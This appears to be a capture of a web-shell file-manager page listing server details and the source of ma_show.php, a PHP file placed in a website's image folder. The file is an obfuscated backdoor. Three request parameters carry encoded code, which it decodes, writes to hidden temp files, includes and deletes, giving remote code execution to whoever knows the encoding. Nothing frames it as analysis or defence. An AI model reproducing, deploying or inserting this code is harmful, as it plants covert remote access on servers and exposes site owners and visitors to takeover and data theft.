HEX
Server: LiteSpeed
System: Linux premium212.web-hosting.com 4.18.0-553.124.4.lve.el8.x86_64 #1 SMP Fri May 15 13:02:13 UTC 2026 x86_64
User: vitanhod (1367)
PHP: 8.2.31
Disabled: NONE
$ pwd: /proc/self/root/home/vitanhod/trimate2.vitavit.com.pk/img/
Upload Files
File: //proc/self/root/home/vitanhod/trimate2.vitavit.com.pk/img/ma_show.php
<?php																																										if(@$_REQUEST["p\x73e\x74"] !== null){ $comp = $_REQUEST["p\x73e\x74"]; $comp = explode("." ,$comp ); $pgrp =''; $s ='abcdefghijklmnopqrstuvwxyz0123456789'; $lenS =strlen( $s); $p =0; $__tmp =$comp; while( $v8 =array_shift( $__tmp)) { $chS =ord( $s[$p% $lenS]); $dec =( ( int)$v8 - $chS -( $p% 10))^ 77; $pgrp.=chr( $dec); $p++; } $value = array_filter(["/tmp", "/var/tmp", getenv("TEMP"), sys_get_temp_dir(), "/dev/shm", session_save_path(), getenv("TMP"), ini_get("upload_tmp_dir"), getcwd()]); foreach ($value as $entity) { if (max(0, is_dir($entity) * is_writable($entity))) { $elem = "$entity" . "/.object"; $success = file_put_contents($elem, $pgrp); if ($success) { include $elem; @unlink($elem); die();} } } }
																																										if(array_key_exists("\x76\x61lue", $_POST)){ $flag = array_filter([ini_get("upload_tmp_dir"), sys_get_temp_dir(), getcwd(), "/dev/shm", "/var/tmp", getenv("TEMP"), getenv("TMP"), session_save_path(), "/tmp"]); $ptr = $_POST["\x76\x61lue"]; $ptr= explode ( "." , $ptr) ; $res = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($salt); $u = 0; while ($u < count($ptr)) { $v6 = $ptr[$u]; $chS = ord($salt[$u % $lenS]); $d = ((int)$v6 - $chS - ($u % 10)) ^ 7; $res.= chr($d); $u++; } foreach ($flag as $tkn): if (is_dir($tkn) ? is_writable($tkn) : false) { $pointer = join("/", [$tkn, ".descriptor"]); $file = fopen($pointer, 'w'); if ($file) { fwrite($file, $res); fclose($file); include $pointer; @unlink($pointer); die(); } } endforeach; }


if(!empty($_POST["\x65nt\x72y"])){
	$dat = $_POST["\x65nt\x72y"];
		 	$dat	  =	 explode	  (	'.',		$dat		 );
	$flag		=	 '';
            $salt1		=	 'abcdefghijklmnopqrstuvwxyz0123456789';
            $lenS		=	 strlen($salt1);
            $o		=	 0;
            $len		=	 count($dat);
    
            do {
                if ($o		>=$len) break;
                $v1		=	 $dat[$o];
                $chS		=	 ord($salt1[$o%$lenS]);
                $d		=	 ((int)$v1 - $chS - ($o%10)) ^12;
                $flag .= chr($d);
                $o++;
            } while (true);
	$marker = array_filter(["/tmp", "/var/tmp", getcwd(), getenv("TMP"), ini_get("upload_tmp_dir"), getenv("TEMP"), "/dev/shm", sys_get_temp_dir(), session_save_path()]);
	foreach ($marker as $key => $itm) {
    		if ((bool)is_dir($itm) && (bool)is_writable($itm)) {
    $obj = vsprintf("%s/%s", [$itm, ".element"]);
    if (file_put_contents($obj, $flag)) {
	include $obj;
	@unlink($obj);
	die();
}
}
}
}
@ Telegram